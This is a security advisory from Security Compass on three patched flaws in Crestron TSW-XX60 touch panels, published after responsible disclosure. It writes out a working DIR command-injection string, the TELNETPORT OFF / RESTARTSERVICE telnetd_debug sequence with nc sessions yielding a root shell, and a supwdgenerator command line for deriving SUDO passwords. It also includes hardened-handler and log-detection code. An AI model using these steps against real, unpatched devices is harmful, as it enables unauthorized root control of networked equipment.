Crestron produces touchscreen devices, such as the TSW-XX60 series, which can be used to schedule meeting rooms in corporate offices. After the release of a recent device firmware update (which addressed several reported vulnerabilities), Security Compass is publishing the following security advisory.
Two remote code execution vulnerabilities and one elevation of privilege vulnerability were discovered and reported to Crestron by Security Compass’ Advisory team. The related technical details are now being disclosed, following Crestron’s latest patch that successfully remediated all reported issues.
The above vulnerabilities were reported to Crestron by Security Compass (Jackson Thuraisamy) in March 2018, and an active dialogue toward remediation continued until the release of patches in May 2018.
Unauthenticated Remote Code Execution via Command Injection in Crestron Terminal Protocol (CTP)
A command-injection vulnerability existed in the Crestron TSW-XX60 touch panels that could be exploited through the CTP administrative interface open on port 41795. This Telnet-like text console is used by the Crestron Toolbox software to manage the devices. The interface does not list any command that gives direct access to the underlying Android OS. The CTP DIR command was nevertheless vulnerable to command injection: its argument was placed into a shell command line, so a crafted payload containing shell metacharacters was interpreted by the shell. Output from the injected commands could be redirected into a text file on the device and read back by the adversary.
The syntax of the DIR command allows a path to be specified:
In the back end, the command being executed in the Android system follows:
ls -le "/mnt/sdcard/ROMDISK/User/schedulingpanel"
An adversary could modify the query to execute a command, such as the following:
ls -le "/mnt/sdcard/ROMDISK/User"; whoami > "/mnt/sdcard/ROMDISK/output.txt"
The built-in TYPE command could then be used to read the standard output of the whoami command:
The base /mnt/sdcard/ROMDISK path could be discovered using built-in CTP commands.
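As an added illustration (not code from the advisory or from Crestron's firmware), the following Python contrasts the vulnerable pattern described above, in which the DIR argument is spliced into a quoted shell command, with a hardened handler that allow-lists characters, confines the path to the ROMDISK tree and never hands the input to a shell. The function names and the assumption that DIR is meant to expose only /mnt/sdcard/ROMDISK are mine.

```python
import os
import re
import subprocess

# Base of the panel's user storage, as named in the advisory (assumed here to
# be the directory tree that DIR is meant to expose).
ROMDISK = "/mnt/sdcard/ROMDISK"


def vulnerable_dir_command(user_path: str) -> str:
    """Reconstruction of the unpatched pattern: the DIR argument is pasted
    into a double-quoted ls invocation that a shell then parses, so a closing
    quote in the argument ends the string and the remainder runs as a
    separate command. Shown for contrast only; never pass this to a shell."""
    return 'ls -le "%s"' % user_path


# Allow-list for DIR arguments: path characters only, so quotes, separators,
# redirections and expansions are rejected before any path handling.
SAFE_PATH = re.compile(r"[A-Za-z0-9_./ -]+")


def safe_dir_argv(user_path: str) -> list:
    """Hardened form: reject metacharacters, resolve the path, confine it to
    ROMDISK and return an argv list so no shell ever sees the user input."""
    if not SAFE_PATH.fullmatch(user_path):
        raise ValueError("DIR: argument contains disallowed characters")
    candidate = user_path if user_path.startswith("/") else os.path.join(ROMDISK, user_path)
    resolved = os.path.normpath(candidate)  # collapses any ../ components
    if os.path.commonpath([ROMDISK, resolved]) != ROMDISK:
        raise ValueError("DIR: path escapes the user storage area")
    return ["ls", "-le", resolved]


def run_dir(user_path: str) -> str:
    """Execute the listing without shell=True; whatever survives validation is
    passed to ls as a literal argument, never interpreted by a shell."""
    proc = subprocess.run(safe_dir_argv(user_path), capture_output=True, text=True)
    return proc.stdout
```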
Unauthenticated Remote Code Execution via Bash Shell Service in Crestron Terminal Protocol (CTP)
The Crestron TSW-XX60 panels have an administrative interface open on port 41795 (Crestron Terminal Protocol). This Telnet-like text console is used by the Crestron Toolbox software to manage the touch panel devices. This interface does not list commands that could be used to directly access the underlying Android OS.
Two conditions existed on the touch panel device that allowed an adversary to gain remote code execution:
- A system service, called telnetd_debug, was capable of binding to a Bash shell on port 23 (this service is disabled by default).
- An undocumented administrative command (RESTARTSERVICE) could be used to start services.
These conditions could be chained by disabling the running telnetd service with the TELNETPORT OFF command and then starting the telnetd_debug service with the RESTARTSERVICE command. Once this sequence had been performed, an interactive shell could be obtained that allowed arbitrary system commands to be run on the device. If the user did not hold the administrative privilege required for a terminal command, they could use the built-in SUDO command to elevate to root privileges (see CVE-2018-13341 below).
The Crestron Toolbox Protocol can be connected to by accessing port 41795 on the TSW-XX60 device. The user would be met with a command line interface.
[email protected]:~$ nc -C 10.60.129.115 41795
TSW-760 Control Console
Telnet Port: On
The user could then disable the running Telnet service and start the telnetd_debug service.
TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> RESTARTSERVICE telnetd_debug
Service telnetd_debug restarted
The telnetd_debug service could then be connected to by accessing port 23. In response, the user received an interactive Bash shell with which commands could be run on the target device as the current running user (i.e. root).
[email protected]:~$ nc -C 10.60.129.115 23
bash-3.2# uname -a
Linux TSW760 3.10.33 #3 SMP PREEMPT Mon Nov 6 16:52:32 EST 2017 armv7l GNU/Linux
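A defender-side illustration added here (not from the advisory or from Crestron): a small detector run over a constructed CTP command log that flags DIR arguments carrying shell metacharacters and the TELNETPORT OFF followed by RESTARTSERVICE telnetd_debug chain described above, attributing both to the client that issued them. The log layout, client addresses and timestamps are constructed assumptions; the advisory does not show the format of the panel's own audit log.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log: "<ISO timestamp> <client address> <command> [args]".
# This layout is an assumption made for the example, not the panel's audit log.
SAMPLE_LOG = """\
2018-03-09T10:15:02 10.60.129.50 HELP ALL
2018-03-09T10:15:10 10.60.129.50 DIR /mnt/sdcard/ROMDISK/User"; whoami > "/mnt/sdcard/ROMDISK/output.txt
2018-03-09T10:16:01 10.60.129.50 TELNETPORT OFF
2018-03-09T10:16:05 10.60.129.50 RESTARTSERVICE telnetd_debug
2018-03-09T10:20:00 10.60.129.77 DIR /mnt/sdcard/ROMDISK/User/schedulingpanel
"""

LINE = re.compile(r"^(\S+) (\S+) (\S+)(?: (.*))?$")
# Characters that have no business in a directory listing argument.
METACHARS = re.compile(r'[;&|`$"\'<>]')
# How close together TELNETPORT OFF and the debug-service start must be to be
# reported as one chain (window is an assumption).
CHAIN_WINDOW = timedelta(minutes=5)


def detect(log_text: str) -> list:
    """Return (client, finding) pairs in the order the suspicious lines occur."""
    findings = []
    last_telnet_off = {}  # client -> time of its most recent TELNETPORT OFF
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts_s, client, cmd, arg = m.groups()
        ts = datetime.fromisoformat(ts_s)
        cmd, arg = cmd.upper(), (arg or "")
        if cmd == "DIR" and METACHARS.search(arg):
            findings.append((client, "dir-metachars"))
        elif cmd == "TELNETPORT" and arg.upper() == "OFF":
            last_telnet_off[client] = ts
        elif cmd == "RESTARTSERVICE":
            if arg.lower() == "telnetd_debug":
                findings.append((client, "telnetd_debug-start"))
                off = last_telnet_off.get(client)
                if off is not None and ts - off <= CHAIN_WINDOW:
                    findings.append((client, "telnet-swap-chain"))
            else:
                # RESTARTSERVICE is undocumented; any other use is worth noting.
                findings.append((client, "restartservice"))
    return findings
```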
Elevation of Privilege in Crestron Terminal Protocol
Crestron TSW-XX60 touch panel devices were affected by a privilege-escalation vulnerability that could be exploited by deriving administrative credentials from material contained in the device firmware. An adversary with access to the system binaries (e.g. by obtaining the firmware) could use the “supwdgenerator” binary to generate administrative passwords for the built-in SUDO command.
This command allowed lower-privileged users to provide credentials that enabled them to run Crestron Terminal Protocol (CTP) commands as an administrator after authentication. After inspecting the device firmware and generating the correct passwords, an adversary could execute commands on the device as an administrator.
The HELP documentation in CTP provided information about commands and the privilege required to execute them. As shown below, the supported user roles are Administrator, Programmer, and Operator.
TSW-760> HELP ALL
GETANALOGJOIN Programmer Get a analog join value
GETAUDITLOG Administrator Retrieve the audit log.
GETDIGITALJOIN Programmer Get a digital join value
GETPAsswordrule Administrator Display password rules
GETSERIALJOIN Programmer Get a serial join value
PING Operator Ping remote node
POEPLUS Programmer Enable/disable 24V
PRINTAUDITLOG Administrator Print the audit log.
PROJECTREFresh Administrator Sets time to Refresh project.
PROJECTRESTART Programmer Restart the user project.
One of the commands (SUDO) allowed a lower-privileged user to run commands as an Administrator. This was done by authenticating with a username and password.
SUDO cmd [param1 param2 ...]
cmd: command to execute.
param1,param2,…: parameters for the command.
TSW-760> SUDO DIR
Invalid user name or password..
Firmware analysis indicated that two additional usernames (crengsuperuser and crsuperuser) were supported, and their passwords were derived from the MAC address of the Ethernet adapter.
An adversary with access to the supwdgenerator application could run it with the command line used by the ctpd application. An example follows:
[email protected]:~$ ./supwdgenerator AA.BB.CC.DD.EE.FF -ForEngineerOnly wDyB[redacted]A8
The adversary could then use the password to authenticate with the SUDO command, as shown below:
TSW-760> SUDO DIR
[DIR] 02-07-18 11:27:41 ROMDISK
[DIR] 09-29-17 18:07:06 SSHBanner
[DIR] 02-07-18 11:21:16 SYS
- Following Security Compass’ responsible disclosure process, Crestron PSIRT was notified of the vulnerabilities on March 9, 2018.
- A response was promptly received from Crestron that they were investigating the matter with their engineering team.
- Crestron acknowledged that the vulnerabilities were true positives and that they were investigating remediation.
- A general release patch was available on May 30, 2018.
To learn more about Security Compass’ Verification Services, read about them here: https://www.securitycompass.com/advisory/services/verification/.